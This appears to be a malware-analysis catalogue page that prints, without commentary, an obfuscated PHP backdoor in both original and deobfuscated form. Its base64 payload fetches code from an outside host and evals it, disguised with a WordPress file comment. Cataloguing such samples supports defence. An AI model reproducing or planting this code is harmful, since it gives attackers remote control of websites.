PHP Malware Analysis

Back to list

Tags


Deobfuscated code

<?php

$uoeq967 = "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";
$vpna644 = 'JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';
$vpna645 = 'zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';
$vpna646 = 'NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';
$vpna647 = 'lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';
$vpna648 = 'JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';
$vpna643 = "JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3NzdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTtldmFsKCc/PicuJHJlc3VsdCk7";
function cdim173($fsxi199, $rykc638, $ekcu564)
{
    return '' . $fsxi199 . '' . $rykc638 . '' . $ekcu564 . '';
}
$qfcg427 = cdim173($uoeq967[34], "al", $uoeq967[3]);
$uodu186 = cdim173("_u", "se", '');
$lrbk358 = cdim173($uoeq967[22], $uoeq967[19], $uoeq967[52]);
$hume205 = cdim173($uoeq967[17], '', $uoeq967[43]);
$xzdo850 = cdim173($uoeq967[34], $uoeq967[19], "ar");
$uqmy998 = cdim173($uoeq967[22], $uoeq967[13], $uoeq967[44]);
$aobc355 = cdim173(cdim173($qfcg427, '', $uodu186), cdim173($lrbk358, $hume205, ''), cdim173($xzdo850, '', $uqmy998));
$xggn756 = cdim173($uoeq967[34], $uoeq967[22], $uoeq967[7]);
$gnix510 = cdim173($uoeq967[13], $uoeq967[28], '');
$wdfm884 = cdim173($uoeq967[7], '', $uoeq967[19]);
$loyh183 = cdim173($uoeq967[52], $uoeq967[17], $uoeq967[43]);
$bwfh819 = cdim173($uoeq967[34], $uoeq967[28], '');
$jrmp133 = cdim173($uoeq967[42], $uoeq967[50], '');
$iprf791 = cdim173('', $uoeq967[43], '');
$hwks376 = cdim173(cdim173($xggn756, $gnix510, $wdfm884), cdim173($loyh183, '', $bwfh819), cdim173($jrmp133, '', $iprf791));
$mtzu128 = cdim173($uoeq967[7], '', $uoeq967[39]);
$hesn342 = cdim173($uoeq967[13], $uoeq967[3], $uoeq967[61]);
$taop807 = cdim173('', $uoeq967[16], $uoeq967[13]);
$gvcw064 = cdim173($uoeq967[2], $uoeq967[7], $uoeq967[20]);
$bihf178 = cdim173($uoeq967[8], $uoeq967[19], $uoeq967[56]);
$efaa907 = cdim173($uoeq967[7], $uoeq967[34], $uoeq967[50]);
$tvhp307 = cdim173($uoeq967[56], $uoeq967[7], $uoeq967[61]);
$qyff908 = cdim173(cdim173($mtzu128, $hesn342, ''), cdim173('', '', $taop807), cdim173($gvcw064, $bihf178 . $efaa907, $tvhp307)) . '"' . $vpna643 . '"' . cdim173("))", '', $uoeq967[41]);
$aobc355($hwks376, array('', '}' . $qyff908 . '//'));
//wp-blog-header scp-173


Original code

<?php
 $uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{17},'',$uoeq967{43});$xzdo850 = cdim173($uoeq967{34},$uoeq967{19},$uoeq967{13}.$uoeq967{22});$uqmy998 = cdim173($uoeq967{22},$uoeq967{13},$uoeq967{44});$aobc355 =cdim173(cdim173($qfcg427,'',$uodu186),cdim173($lrbk358,$hume205,''),cdim173($xzdo850,'',$uqmy998));$xggn756 = cdim173($uoeq967{34},$uoeq967{22},$uoeq967{7});$gnix510 = cdim173($uoeq967{13},$uoeq967{28},'');$wdfm884 = cdim173($uoeq967{7},'',$uoeq967{19});$loyh183 = cdim173($uoeq967{52},$uoeq967{17},$uoeq967{43});$bwfh819 = cdim173($uoeq967{34},$uoeq967{28},'');$jrmp133 = cdim173($uoeq967{42},$uoeq967{50},'');$iprf791 = cdim173('',$uoeq967{43},'');$hwks376 = cdim173( cdim173($xggn756,$gnix510,$wdfm884), cdim173($loyh183,'',$bwfh819), cdim173($jrmp133,'',$iprf791));$mtzu128 = cdim173($uoeq967{7},'',$uoeq967{39});$hesn342= cdim173($uoeq967{13},$uoeq967{3},$uoeq967{61});$taop807 = cdim173('',$uoeq967{16},$uoeq967{13});$gvcw064 = cdim173($uoeq967{2},$uoeq967{7},$uoeq967{20});$bihf178 = cdim173($uoeq967{8},$uoeq967{19},$uoeq967{56});$efaa907 = cdim173($uoeq967{7},$uoeq967{34},$uoeq967{50});$tvhp307 = cdim173($uoeq967{56},$uoeq967{7},$uoeq967{61});$qyff908 = cdim173(cdim173($mtzu128,$hesn342,''),cdim173('','',$taop807),cdim173($gvcw064,$bihf178.$efaa907,$tvhp307)).'"'.$vpna643.'"'.cdim173($uoeq967{1}.$uoeq967{1},'',$uoeq967{41});$aobc355($hwks376,array('','}'.$qyff908.'//'));//wp-blog-header scp-173?>